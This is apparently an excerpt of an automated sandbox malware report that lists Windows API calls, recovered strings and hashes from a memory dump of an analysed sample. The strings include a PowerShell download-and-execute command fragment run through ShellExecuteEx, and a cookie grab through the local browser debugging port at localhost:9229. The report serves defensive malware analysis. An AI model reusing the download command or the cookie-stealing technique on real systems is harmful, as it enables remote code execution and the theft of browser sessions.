                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: a11e050666896b86e13b6641bed35afc4609dfb5bed31689528067a0776709d0
                            • Instruction ID: b7839daec5544cf72eca06b74b9b3e26355d479806339fde86737d8c5f4b591e
                            • Opcode Fuzzy Hash: a11e050666896b86e13b6641bed35afc4609dfb5bed31689528067a0776709d0
                            • Instruction Fuzzy Hash: B5116AB1A79714EFC710AFB4EC0DA573AB8BB0A709304091AF591D21A1DAF84440FF50
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EBE53
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EBE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006EBE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EBEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006EBEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EBEEB
                            • lstrlen.KERNEL32(')"), ref: 006EBEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 006EBF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006EBF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EBF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006EBF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBFBA
                            • ShellExecuteEx.SHELL32(?), ref: 006EC00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: a359c57ee4b298ab8e14e492d7ce81fb51d3de34c866de36617cb76b7c41b8e7
                            • Instruction ID: 05034916890a63062ad43d24bbcc7eefb3bf9574c5f398d16390a9af9e7c9a1b
                            • Opcode Fuzzy Hash: a359c57ee4b298ab8e14e492d7ce81fb51d3de34c866de36617cb76b7c41b8e7
                            • Instruction Fuzzy Hash: 3A61D470E1639A9FCB61AFB69C596AF7BBAAF14300F046429F505D7352DB34C8018B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F184F
                            • lstrlen.KERNEL32(01006F30), ref: 006F1860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F18C1
                            • lstrlen.KERNEL32(00704FA0), ref: 006F18D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F18F4
                            • lstrcat.KERNEL32(00000000,00704FA0), ref: 006F1900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F192F
                            • lstrlen.KERNEL32(01006F40), ref: 006F1945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F19A6
                            • lstrlen.KERNEL32(00704FA0), ref: 006F19B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F19D9
                            • lstrcat.KERNEL32(00000000,00704FA0), ref: 006F19E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1A14
                            • lstrlen.KERNEL32(01007010), ref: 006F1A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1A8B
                            • lstrlen.KERNEL32(01006F50), ref: 006F1AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1B02
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 2645389dc38b9aa7b800bbea976969f78afe3048a584271e4d0b55f6c623ac97
                            • Instruction ID: 26fd8777971613660e0bf9ce65ae42373de073b4f46ba8c4b8199f6d9f4d59ed
                            • Opcode Fuzzy Hash: 2645389dc38b9aa7b800bbea976969f78afe3048a584271e4d0b55f6c623ac97
                            • Instruction Fuzzy Hash: C4919EB0A1430BDFD7209FB6DC98A67B7EAEF15380B14542DA996CB351DB34E841CB50
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006E47C5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4812
                            • lstrlen.KERNEL32(00704B60), ref: 006E481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E483A
                            • lstrcat.KERNEL32(00000000,00704B60), ref: 006E4846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E48A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E48CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 006E48DC
                            • lstrlen.KERNEL32(?), ref: 006E48F0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4931
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E49B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E49E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: f35bd6b10df15227fa83e5dc1b4388c3c42f8c4e43884f733e9c129cf733654d
                            • Instruction ID: eff4d3de05988ecc003fffc0748b82ecd155ce8dda72949a0c083404b38f46bf
                            • Opcode Fuzzy Hash: f35bd6b10df15227fa83e5dc1b4388c3c42f8c4e43884f733e9c129cf733654d
                            • Instruction Fuzzy Hash: 90B1A071A163569BCB71EF7AD899AAF77B6AF50300F044129F846A7351DF30EC018B94
                            APIs
                              • Part of subcall function 006D90C0: InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D90DF
                              • Part of subcall function 006D90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006D90FC
                              • Part of subcall function 006D90C0: InternetCloseHandle.WININET(00000000), ref: 006D9109
                            • strlen.MSVCRT ref: 006D92E1
                            • strlen.MSVCRT ref: 006D92FA
                              • Part of subcall function 006D8980: std::_Xinvalid_argument.LIBCPMT ref: 006D8996
                            • strlen.MSVCRT ref: 006D9399
                            • strlen.MSVCRT ref: 006D93E6
                            • lstrcat.KERNEL32(?,cookies), ref: 006D9547
                            • lstrcat.KERNEL32(?,00701794), ref: 006D9559
                            • lstrcat.KERNEL32(?,?), ref: 006D956A
                            • lstrcat.KERNEL32(?,00704B98), ref: 006D957C
                            • lstrcat.KERNEL32(?,?), ref: 006D958D
                            • lstrcat.KERNEL32(?,.txt), ref: 006D959F
                            • lstrlen.KERNEL32(?), ref: 006D95B6
                            • lstrlen.KERNEL32(?), ref: 006D95DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D9614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: 9c7d05258c920dce4bccfe92fd1519ebbd07eacc0751ee54c86e9016ba9e6b79
                            • Instruction ID: 42f8b209be02cba0d5b516d9699d712c1fbb2cadaf2896f80e066610a9cf270a
                            • Opcode Fuzzy Hash: 9c7d05258c920dce4bccfe92fd1519ebbd07eacc0751ee54c86e9016ba9e6b79
                            • Instruction Fuzzy Hash: CAE117B1E10219DFDF50DFA8D890ADEBBF6AF58300F1444AAE509A7341DB349A45CB94
                            APIs
                            • memset.MSVCRT ref: 006ED9A1
                            • memset.MSVCRT ref: 006ED9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006ED9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EDA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 006EDA1C
                            • lstrcat.KERNEL32(?,0101F190), ref: 006EDA36
                            • lstrcat.KERNEL32(?,?), ref: 006EDA4A
                            • lstrcat.KERNEL32(?,0101DC48), ref: 006EDA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EDA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006EDA95
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EDAFE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 131b16ff32799a34d4f866e08f080269730ac0cbe180f531c11698d045489514
                            • Instruction ID: 05a030673fdc29dde2ad8ba6bc52a91f5d5ad707d00f3a73c140c2cc84bc5d80
                            • Opcode Fuzzy Hash: 131b16ff32799a34d4f866e08f080269730ac0cbe180f531c11698d045489514
                            • Instruction Fuzzy Hash: 1CB1CDB1D10259AFDB20EFA4CC949EEB7BAEF48300F144569F946A7341EA309E44CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DB330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DB3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB3D9
                            • lstrlen.KERNEL32(00704C50), ref: 006DB450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB474
                            • lstrcat.KERNEL32(00000000,00704C50), ref: 006DB480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB4A9
                            • lstrlen.KERNEL32(00000000), ref: 006DB52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DB55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB587
                            • lstrlen.KERNEL32(00704AD4), ref: 006DB5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB622
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006DB62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB65E
                            • lstrlen.KERNEL32(?), ref: 006DB767
                            • lstrlen.KERNEL32(?), ref: 006DB776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB79E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 99bb062419e595302dbf533c86252c32763fa6b0117fa5c135a0f0154b675b7e
                            • Instruction ID: cd06e42c206833f0f888b142504496c50ba442bf4c8e558b51cccd878549fc4f
                            • Opcode Fuzzy Hash: 99bb062419e595302dbf533c86252c32763fa6b0117fa5c135a0f0154b675b7e
                            • Instruction Fuzzy Hash: C9024D70E15206CFCB65DF65D998BAAB7F2AF44304F1A906EE4099B366D731DC42CB80
                            APIs
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • RegOpenKeyExA.ADVAPI32(?,0101BB60,00000000,00020019,?), ref: 006F37BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006F37F7
                            • wsprintfA.USER32 ref: 006F3822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 006F3840
                            • RegCloseKey.ADVAPI32(?), ref: 006F384E
                            • RegCloseKey.ADVAPI32(?), ref: 006F3858
                            • RegQueryValueExA.ADVAPI32(?,0101F808,00000000,000F003F,?,?), ref: 006F38A1
                            • lstrlen.KERNEL32(?), ref: 006F38B6
                            • RegQueryValueExA.ADVAPI32(?,0101F820,00000000,000F003F,?,00000400), ref: 006F3927
                            • RegCloseKey.ADVAPI32(?), ref: 006F3972
                            • RegCloseKey.ADVAPI32(?), ref: 006F3989
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: e9ac054c2c2100ce58ae6de0f7cca1164a6b492af0acb4c18883df6ef9c5a440
                            • Instruction ID: 30f6861e4f07ab3fa9c702d03747db470b76390d3d993965c47b3976deceed5d
                            • Opcode Fuzzy Hash: e9ac054c2c2100ce58ae6de0f7cca1164a6b492af0acb4c18883df6ef9c5a440
                            • Instruction Fuzzy Hash: E0918EB2E042199FCB10DFA4CD849EEB7BAFB48310F148569E609AB351D771AE41CB90
                            APIs
                            • InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D90DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006D90FC
                            • InternetCloseHandle.WININET(00000000), ref: 006D9109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 006D9166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006D9197
                            • InternetCloseHandle.WININET(00000000), ref: 006D91A2
                            • InternetCloseHandle.WININET(00000000), ref: 006D91A9
                            • strlen.MSVCRT ref: 006D91BA
                            • strlen.MSVCRT ref: 006D91ED
                            • strlen.MSVCRT ref: 006D922E
                            • strlen.MSVCRT ref: 006D924C
                              • Part of subcall function 006D8980: std::_Xinvalid_argument.LIBCPMT ref: 006D8996
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 06b4840ff0d325bda6b1b6a1231ce65d046e0b870fe09d08aeb72b594831ebf2
                            • Instruction ID: 8ce6462f1b3c4a590131468d3f5c8e8dbbcc754039a73104a2a1dd6373757cbf
                            • Opcode Fuzzy Hash: 06b4840ff0d325bda6b1b6a1231ce65d046e0b870fe09d08aeb72b594831ebf2
                            • Instruction Fuzzy Hash: B45181B1A10209ABD710DBA8DC45FEEF7FA9F48710F14016AF605A3381DBB49A4487A5
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006F16A1
                            • lstrcpy.KERNEL32(00000000,0100A860), ref: 006F16CC
                            • lstrlen.KERNEL32(?), ref: 006F16D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F16F6
                            • lstrcat.KERNEL32(00000000,?), ref: 006F1704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F172A
                            • lstrlen.KERNEL32(0101EB50), ref: 006F173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1762
                            • lstrcat.KERNEL32(00000000,0101EB50), ref: 006F176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1792
                            • ShellExecuteEx.SHELL32(?), ref: 006F17CD
                            • ExitProcess.KERNEL32 ref: 006F1803
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: ae68d122b64ded7e20aa2e8c3ab15a4ada84f166b41cfd02e9913faec1726a10
                            • Instruction ID: f9e81d195f0821634e97f73740f8ef1bb3da2d950c615fe2181ae92c0a2c6fb1
                            • Opcode Fuzzy Hash: ae68d122b64ded7e20aa2e8c3ab15a4ada84f166b41cfd02e9913faec1726a10
                            • Instruction Fuzzy Hash: 4651C470E1121AEFDB60EFA5CC946EEB7FAAF54340F044129E609E7351DB30AE019B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006EF026
                            • lstrlen.KERNEL32(00000000), ref: 006EF035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 006EF053
                            • StrStrA.SHLWAPI(00000000,?), ref: 006EF081
                            • lstrlen.KERNEL32(?), ref: 006EF094
                            • lstrlen.KERNEL32(00000000), ref: 006EF0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 006EF0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 006EF13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 0994d46155e9216594e60d8edba8c46b6312ff90afc896b1148caa5bbcf844fc
                            • Instruction ID: 51d43d04f9ab6ca1f463a97d1bfea8fd5e2a7cdc585090490537f687868c0e6b
                            • Opcode Fuzzy Hash: 0994d46155e9216594e60d8edba8c46b6312ff90afc896b1148caa5bbcf844fc
                            • Instruction Fuzzy Hash: 6651C0B1A112569FCB71AF76DC59AAE77E6EF50310F08816DF84A9B352DA30DC018B90
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(01018C38,00909BD8,0000FFFF), ref: 006DA026
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DA053
                            • lstrlen.KERNEL32(00909BD8), ref: 006DA060
                            • lstrcpy.KERNEL32(00000000,00909BD8), ref: 006DA08A
                            • lstrlen.KERNEL32(00704C4C), ref: 006DA095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DA0B2
                            • lstrcat.KERNEL32(00000000,00704C4C), ref: 006DA0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DA0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DA0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DA114
                            • SetEnvironmentVariableA.KERNEL32(01018C38,00000000), ref: 006DA12F
                            • LoadLibraryA.KERNEL32(010055A8), ref: 006DA143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 85c4ac7d63c5435d940a47481e2b818446a77157f772ca6e29ac0ce5fd522d22
                            • Instruction ID: 362a335cd3eab8ef715821f5127a21008b9e070fc8edb6d9e50c760775f22190
                            • Opcode Fuzzy Hash: 85c4ac7d63c5435d940a47481e2b818446a77157f772ca6e29ac0ce5fd522d22
                            • Instruction Fuzzy Hash: F291E170E18A019FD730AFE5DC44AA737A7EB94704F44412AE5458B3A2EFB5DD40DB82
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EC8A2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EC8D1
                            • lstrlen.KERNEL32(00000000), ref: 006EC8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EC932
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006EC943
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 74376fee1fbfb6687ea25458719083bca77ab7f345361f4cc01eb061efa60204
                            • Instruction ID: f1fc2d0e5f68635cff0f799ef439fe16c82fd2ab33e66cdf4e92cdc9836ea3ec
                            • Opcode Fuzzy Hash: 74376fee1fbfb6687ea25458719083bca77ab7f345361f4cc01eb061efa60204
                            • Instruction Fuzzy Hash: 8C61A3B1E1235A9FDB10EFBAC945AEE7BBAAF15310F044569E841E7341D73489028B90
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,006F0CF0), ref: 006F4276
                            • GetDesktopWindow.USER32 ref: 006F4280
                            • GetWindowRect.USER32(00000000,?), ref: 006F428D
                            • SelectObject.GDI32(00000000,00000000), ref: 006F42BF
                            • GetHGlobalFromStream.COMBASE(006F0CF0,?), ref: 006F4336
                            • GlobalLock.KERNEL32(?), ref: 006F4340
                            • GlobalSize.KERNEL32(?), ref: 006F434D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 692ee66dd6c45a56cdb9115b7e00415ca1dfca4cde96201a2d553d2ae3168805
                            • Instruction ID: 79067813915dc74c3656d7e717348ff4f6075bc05ea650a71dcfa1ba975b7403
                            • Opcode Fuzzy Hash: 692ee66dd6c45a56cdb9115b7e00415ca1dfca4cde96201a2d553d2ae3168805
                            • Instruction Fuzzy Hash: ED513FB5A24209AFDB10DFB4DC85AEFB7B9EF48300F104519FA05E3251DB74AD019BA0
                            APIs
                            • lstrcat.KERNEL32(?,0101F190), ref: 006EE00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EE037
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE06F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE07D
                            • lstrcat.KERNEL32(?,?), ref: 006EE098
                            • lstrcat.KERNEL32(?,?), ref: 006EE0AC
                            • lstrcat.KERNEL32(?,0100A4A0), ref: 006EE0C0
                            • lstrcat.KERNEL32(?,?), ref: 006EE0D4
                            • lstrcat.KERNEL32(?,0101E4D8), ref: 006EE0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006EE126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: c5fd0255dfbafa7383e04a939e4c8e78fe3ba113511e722eb0c8273beb4ecc3f
                            • Instruction ID: 56ef5b9a2b67abe03ad6d350f320db0492e2977ee905c3706f1116f3dbebd71b
                            • Opcode Fuzzy Hash: c5fd0255dfbafa7383e04a939e4c8e78fe3ba113511e722eb0c8273beb4ecc3f
